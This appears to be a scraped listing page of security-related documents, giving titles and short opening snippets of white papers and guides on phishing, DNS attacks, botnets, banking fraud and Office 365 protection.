TOP TEN DNS ATTACKS PROTECTING YOUR ORGANIZATION AGAINST TODAY S FAST-GROWING THREATS TOP TEN DNS ATTACKS PROTECTING YOUR ORGANIZATION AGAINST TODAY S FAST-GROWING THREATS 1 Introduction Your data and infrastructure are at the heart of your business. Your employees, business partners, and

More information

Machine-Powered Learning for People-Centered Security

Machine-Powered Learning for People-Centered Security White paper Machine-Powered Learning for People-Centered Security Protecting Email with the Proofpoint Stateful Composite Scoring Service www.proofpoint.com INTRODUCTION: OUTGUNNED AND OVERWHELMED Today

More information

Protecting from Attack in Office 365

Protecting  from Attack in Office 365 A hacker only needs one person to click on their fraudulent link to access credit card, debit card and Social Security numbers, names, addresses, proprietary information and other sensitive data. Protecting

More information

The Credential Phishing Handbook. Why It Still Works and 4 Steps to Prevent It

The Credential Phishing Handbook. Why It Still Works and 4 Steps to Prevent It The Credential Phishing Handbook Why It Still Works and 4 Steps to Prevent It Introduction Phishing is more than 20 years old, but still represents more than 90% of targeted attacks. The reason is simple:

More information

Best Practices Guide to Electronic Banking

Best Practices Guide to Electronic Banking Best Practices Guide to Electronic Banking City Bank & Trust Company offers a variety of services to our customers. As these services have evolved over time, a much higher percentage of customers have

More information

CAREERBUILDER.COM - PRIVACY POLICY

CAREERBUILDER.COM - PRIVACY POLICY Effective Date: September 15, 2010 CareerBuilder, LLC and its subsidiaries and divisions (collectively, CareerBuilder, We or Our ) has drafted its Privacy Policy to ensure that you can use CareerBuilder

More information

Attackers Process. Compromise the Root of the Domain Network: Active Directory

Attackers Process. Compromise the Root of the Domain Network: Active Directory Attackers Process Compromise the Root of the Domain Network: Active Directory BACKDOORS STEAL CREDENTIALS MOVE LATERALLY MAINTAIN PRESENCE PREVENTION SOLUTIONS INITIAL RECON INITIAL COMPROMISE ESTABLISH

More information

BRING SPEAR PHISHING PROTECTION TO THE MASSES

BRING SPEAR PHISHING PROTECTION TO THE MASSES E-Guide BRING SPEAR PHISHING PROTECTION TO THE MASSES SearchSecurity phishing. I n this expert tip, David Sherry describes how a combination of technical controls and user awareness training can help put

More information

Security & Phishing

Security & Phishing Email Security & Phishing Best Practices In Cybersecurity Presenters Bill Shieh Guest Speaker Staff Engineer Information Security Ellie Mae Supervisory Special Agent Cyber Crime FBI 2 What Is Phishing?

More information

Office 365 Buyers Guide: Best Practices for Securing Office 365

Office 365 Buyers Guide: Best Practices for Securing Office 365 Office 365 Buyers Guide: Best Practices for Securing Office 365 Microsoft Office 365 has become the standard productivity platform for the majority of organizations, large and small, around the world.

More information

Bringing the Fight to Them: Exploring Aggressive Countermeasures to Phishing and other Social Engineering Scams

Bringing the Fight to Them: Exploring Aggressive Countermeasures to Phishing and other Social Engineering Scams Bringing the Fight to Them: Exploring Aggressive Countermeasures to Phishing and other Social Engineering Scams Allen Zhou Comp116 Final Presentation What is Phishing? Social Engineering Steal credentials,

More information

Phishing Activity Trends Report October, 2004

Phishing Activity Trends Report October, 2004 Phishing Activity Trends Report October, 2004 Phishing is a form of online identity theft that uses spoofed emails designed to lure recipients to fraudulent websites which attempt to trick them into divulging

More information

Security and Privacy

Security and Privacy E-mail Security and Privacy Department of Computer Science Montclair State University Course : CMPT 320 Internet/Intranet Security Semester : Fall 2008 Student Instructor : Alex Chen : Dr. Stefan Robila

More information

FAQ: Privacy, Security, and Data Protection at Libraries

FAQ: Privacy, Security, and Data Protection at Libraries FAQ: Privacy, Security, and Data Protection at Libraries This FAQ was developed out of workshops and meetings connected to the Digital Privacy and Data Literacy Project (DPDL) and Brooklyn Public Library

More information

Streaming Prevention in Cb Defense. Stop malware and non-malware attacks that bypass machine-learning AV and traditional AV

Streaming Prevention in Cb Defense. Stop malware and non-malware attacks that bypass machine-learning AV and traditional AV Streaming Prevention in Cb Defense Stop malware and non-malware attacks that bypass machine-learning AV and traditional AV 2 STREAMING PREVENTION IN Cb DEFENSE OVERVIEW Over the past three years, cyberattackers

More information

Quick Heal Total Security for Android. Anti-Theft Security. Web Security. Backup. Real-Time Protection. Safe Online Banking & Shopping.

Quick Heal Total Security for Android. Anti-Theft Security. Web Security. Backup. Real-Time Protection. Safe Online Banking & Shopping. Quick Heal Total Security for Android Anti-Theft Security. Web Security. Backup. Real-Time Protection. Safe Online Banking & Shopping. Product Highlights Complete protection for your Android device that

More information

STOPS CYBER ATTACKS BEFORE THEY STOP YOU. Prepare, recognize, and respond to today s attacks earlier with Verizon Security Solutions.

STOPS CYBER ATTACKS BEFORE THEY STOP YOU. Prepare, recognize, and respond to today s attacks earlier with Verizon Security Solutions. Intelligence-driven security STOPS CYBER ATTACKS BEFORE THEY STOP YOU. Prepare, recognize, and respond to today s attacks earlier with Verizon Security Solutions. BETTER INTELLIGENCE. BETTER DEFENSE. The

More information

How to recognize phishing s

How to recognize phishing  s Phishing email messages, websites, and phone calls are designed to steal money, steal data and/or destroy information. Cybercriminals can do this by installing malicious software on your computer or stealing

More information

Radix Acceptable Use and Anti-Abuse Policy

Radix Acceptable Use and Anti-Abuse Policy Radix Acceptable Use and Anti-Abuse Policy 1. General Provisions 1. Radix FZC and its subsidiaries ( Radix ) arecommitted to the stable and secure operation of its top-level domains ( TLDs ). Abusive use

More information

Online Scams. Ready to get started? Click on the green button to continue.

Online Scams. Ready to get started? Click on the green button to continue. Online Scams Hi, I m Kate. We re here to learn how to protect ourselves from online scams. We ll follow along with Kevin to learn what types of scams are out there, how to recognize the warning signs,

More information

EBOOK. Stopping Fraud. How Proofpoint Helps Protect Your Organisation from Impostors, Phishers and Other Non-Malware Threats.

EBOOK. Stopping  Fraud. How Proofpoint Helps Protect Your Organisation from Impostors, Phishers and Other Non-Malware Threats. EBOOK Stopping Email Fraud How Proofpoint Helps Protect Your Organisation from Impostors, Phishers and Other Non-Malware Threats www.proofpoint.com EBOOK Stopping Email Fraud 2 Today s email attacks have

More information

CISNTWK-440. Chapter 4 Network Vulnerabilities and Attacks

CISNTWK-440. Chapter 4 Network Vulnerabilities and Attacks CISNTWK-440 Intro to Network Security Chapter 4 Network Vulnerabilities and Attacks Objectives Explain the types of network vulnerabilities List categories of network attacks Define different methods of

More information

FRAUDULENT TRAVEL SCAMS

FRAUDULENT TRAVEL SCAMS FINANCIAL INTELLIGENCE CENTRE (FIC) REPUBLIC OF NAMIBIA P.O.BOX 2882, Windhoek Tel: + 264 61 2835100, Fax +264 61 2835259 Web address: www.fic.na E-mail address: helpdesk@fic.na FRAUDULENT TRAVEL SCAMS

More information

Cyber Crime Seminar. No Victim Too Small Why Small Businesses Are Low Hanging Fruit

Cyber Crime Seminar. No Victim Too Small Why Small Businesses Are Low Hanging Fruit Cyber Crime Seminar No Victim Too Small Why Small Businesses Are Low Hanging Fruit Why Are We Here? What is Cybercrime? Why YOU may become the next victim? What do they attack? Why do they attack? How

More information

A Step By Step Guide To Use PayPal

A Step By Step Guide To Use PayPal A Step By Step Guide To Use PayPal Table of Contents Introduction... 3 Creating an Account... 4 PayPal Verification... 5 Verification Process... 5 Utility of Each Account... 7 Transfer of Funds... 8 Checking

More information

Do not open attachments on s that you are not sure of.

Do not open attachments on  s that you are not sure of. Avoid free online offers of programs to rid your hard drive of viruses and shred your history completely. It will probably install spyware or infect your hard drive. Do not open attachments on emails that

More information

Copyright

Copyright 1 Security Test EXTRA Workshop : ANSWER THESE QUESTIONS 1. What do you consider to be the biggest security issues with mobile phones? 2. How seriously are consumers and companies taking these threats?

More information

Online Services User Guide

Online Services User Guide Online Services User Guide Welcome to Online & Mobile Banking! Whether you re online or using a mobile device, manage your money whenever and wherever it s convenient for you. Access Visit BankMidwest.com

More information

Custom Plugin A Solution to Phishing and Pharming Attacks

Custom Plugin A Solution to Phishing and Pharming Attacks Custom Plugin A Solution to Phishing and Pharming Attacks Omer Mahmood School of Information Technology Charles Darwin University Darwin, NT, Australia Abstract - This paper proposes a new method to detect,

More information

How technology changed fraud investigations. Jean-François Legault Senior Manager Analytic & Forensic Technology June 13, 2011

How technology changed fraud investigations. Jean-François Legault Senior Manager Analytic & Forensic Technology June 13, 2011 How technology changed fraud investigations Jean-François Legault Senior Manager Analytic & Forensic Technology June 13, 2011 The Changing Cyberfraud Landscape Underground Economy Malware Authors Organized

More information

Automated Context and Incident Response

Automated Context and Incident Response Technical Brief Automated Context and Incident Response www.proofpoint.com Incident response requires situational awareness of the target, his or her environment, and the attacker. However, security alerts

More information

Thanks for attending this session on April 6 th, 2016 If you have any question, please contact Jim at

Thanks for attending this session on April 6 th, 2016 If you have any question, please contact Jim at Thanks! Thanks for attending this session on April 6 th, 2016 If you have any question, please contact Jim at jim@stickleyonsecurity.com Don t forget to checkout Stickley on Security and learn about our

More information

Botnet Communication Topologies

Botnet Communication Topologies Understanding the intricacies of botnet Command-and-Control By Gunter Ollmann, VP of Research, Damballa, Inc. Introduction A clear distinction between a bot agent and a common piece of malware lies within

More information

FTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved.

FTA 2017 SEATTLE. Cybersecurity and the State Tax Threat Environment. Copyright FireEye, Inc. All rights reserved. FTA 2017 SEATTLE Cybersecurity and the State Tax Threat Environment 1 Agenda Cybersecurity Trends By the Numbers Attack Trends Defensive Trends State and Local Intelligence What Can You Do? 2 2016: Who

More information

RSA Fraud & Risk Intelligence Solutions

RSA Fraud & Risk Intelligence Solutions RSA Fraud & Risk Intelligence Solutions Separating Customers from Criminals May 2015 1 Mobile Social Identities IOT Alternative Authentication Market Disruptors Biometrics Cross Channel Intelligence Sharing

More information

Protecting Against Online Banking Fraud with F5

Protecting Against Online Banking Fraud with F5 Protecting Against Online Banking Fraud with F5 Fraud is a relentless threat to financial services organizations that offer online banking. The F5 Web Fraud Protection solution defends against malware,

More information

Cyber Insurance: What is your bank doing to manage risk? presented by

Cyber Insurance: What is your bank doing to manage risk? presented by Cyber Insurance: What is your bank doing to manage risk? David Kitchen presented by Lisa Micciche Today s Agenda Claims Statistics Common Types of Cyber Attacks Typical Costs Incurred to Respond to an

More information

WHITE PAPER. Best Practices for Web Application Firewall Management

WHITE PAPER. Best Practices for Web Application Firewall Management WHITE PAPER Best Practices for Web Application Firewall Management WHITE PAPER Best Practices for Web Application Firewall Management.. INTRODUCTION 1 DEPLOYMENT BEST PRACTICES 2 Document your security

More information

SECURITY ON PUBLIC WI-FI New Zealand. A guide to help you stay safe online while using public Wi-Fi

SECURITY ON PUBLIC WI-FI New Zealand. A guide to help you stay safe online while using public Wi-Fi SECURITY ON PUBLIC WI-FI New Zealand A guide to help you stay safe online while using public Wi-Fi WHAT S YOUR WI-FI PASSWORD? Enter password for the COFFEE_TIME Wi-Fi network An all too common question

More information

How. Biometrics. Expand the Reach of Mobile Banking ENTER

How. Biometrics. Expand the Reach of Mobile Banking ENTER How Biometrics Expand the Reach of Mobile Banking ENTER Table of Contents 01 The Mobile Banking Opportunity 02 What s Suppressing Mobile Adoption? 03 Onboarding Challenges: Proving One s Identity 04 Authentication

More information

3.5 SECURITY. How can you reduce the risk of getting a virus?

3.5 SECURITY. How can you reduce the risk of getting a virus? 3.5 SECURITY 3.5.4 MALWARE WHAT IS MALWARE? Malware, short for malicious software, is any software used to disrupt the computer s operation, gather sensitive information without your knowledge, or gain

More information

Securing Privileged Access and the SWIFT Customer Security Controls Framework (CSCF)

Securing Privileged Access and the SWIFT Customer Security Controls Framework (CSCF) Securing Privileged Access and the SWIFT Customer Security Controls Framework (CSCF) A Guide to Leveraging Privileged Account Security to Assist with SWIFT CSCF Compliance Table of Contents Executive Summary...

More information

10 FOCUS AREAS FOR BREACH PREVENTION

10 FOCUS AREAS FOR BREACH PREVENTION 10 FOCUS AREAS FOR BREACH PREVENTION Keith Turpin Chief Information Security Officer Universal Weather and Aviation Why It Matters Loss of Personally Identifiable Information (PII) Loss of Intellectual

More information

THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION

THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION BREACH & ATTACK SIMULATION BREACH & ATTACK SIMULATION THE EFFECTIVE APPROACH TO CYBER SECURITY VALIDATION Cymulate s cyber simulation platform allows you to test your security assumptions, identify possible security gaps and receive

More information

Phishing Activity Trends Report August, 2005

Phishing Activity Trends Report August, 2005 Phishing Activity Trends Report August, 25 Phishing is a form of online identity theft that employs both social engineering and technical subterfuge to steal consumers' personal identity data and financial

More information

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any

Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any OWASP Top 10 Provide you with a quick introduction to web application security Increase you awareness and knowledge of security in general Show you that any tester can (and should) do security testing

More information

5 Trends That Will Impact Your IT Planning in Layered Security. Executive Brief

5 Trends That Will Impact Your IT Planning in Layered Security. Executive Brief 5 Trends That Will Impact Your IT Planning in 2012 Layered Security Executive Brief a QuinStreet Excutive Brief. 2011 Layered Security Many of the IT trends that your organization will tackle in 2012 aren

More information

WHITEPAPER ENDPOINT DETECTION AND RESPONSE BEYOND ANTIVIRUS PROACTIVE THREAT HUNTING AT THE ENDPOINT

WHITEPAPER ENDPOINT DETECTION AND RESPONSE BEYOND ANTIVIRUS PROACTIVE THREAT HUNTING AT THE ENDPOINT WHITEPAPER ENDPOINT DETECTION AND RESPONSE BEYOND ANTIVIRUS PROACTIVE THREAT HUNTING AT THE ENDPOINT THREE DECADES OF COMPUTER THREATS In 1986, the Brain boot sector virus caused the first widespread realization

More information

PHISHING Takedown Process

PHISHING Takedown Process PHISHING Takedown Process CONGRATULATIONS, you just won a trip to the Bahamas! Update your password now! Please confirm your account information. You have a tax refund waiting for you. These are the common

More information

Botnets: major players in the shadows. Author Sébastien GOUTAL Chief Science Officer

Botnets: major players in the shadows. Author Sébastien GOUTAL Chief Science Officer Botnets: major players in the shadows Author Sébastien GOUTAL Chief Science Officer Table of contents Introduction... 3 Birth of a botnet... 4 Life of a botnet... 5 Death of a botnet... 8 Introduction

More information

Phishing Activity Trends

Phishing Activity Trends Phishing Activity Trends Report for the Month of June, 2007 Summarization of June Report Findings In the June 2007 report the APWG introduces a brand-domain pairs measurement (page 4) which combines the

More information

Monitise. RSA Adaptive Authentication On-Premise Implementation Guide. Partner Information. Monitise Mobile Banking Solution

Monitise. RSA Adaptive Authentication On-Premise Implementation Guide. Partner Information. Monitise Mobile Banking Solution RSA Adaptive Authentication On-Premise Implementation Guide Partner Information Last Modified: June 12, 2013 Product Information Partner Name Web Site www.monitise.com Product Name Version & Platform 5.0

More information

Q WEB APPLICATION ATTACK STATISTICS

Q WEB APPLICATION ATTACK STATISTICS WEB APPLICATION ATTACK STATISTICS CONTENTS Introduction...3 Results at a glance...4 Web application attacks: statistics...5 Attack types...5 Attack trends...8 Conclusions... 11 2 INTRODUCTION This report

More information

Quick Heal Mobile Security. Free protection for your Android phone against virus attacks, unwanted calls, and theft.

Quick Heal Mobile Security. Free protection for your Android phone against virus attacks, unwanted calls, and theft. Quick Heal Mobile Security Free protection for your Android phone against virus attacks, unwanted calls, and theft. Product Highlights Complete protection for your Android device that simplifies security

More information

Paystar Remittance Suite Tokenless Two-Factor Authentication

Paystar Remittance Suite Tokenless Two-Factor Authentication Paystar Remittance Suite Tokenless Two-Factor Authentication Introduction Authentication is the process by which a computer system positively identifies a user It is commonly considered to be one of the

More information

Computer Security 3e. Dieter Gollmann. Chapter 18: 1

Computer Security 3e. Dieter Gollmann.  Chapter 18: 1 Computer Security 3e Dieter Gollmann www.wiley.com/college/gollmann Chapter 18: 1 Chapter 18: Web Security Chapter 18: 2 Web 1.0 browser HTTP request HTML + CSS data web server backend systems Chapter

More information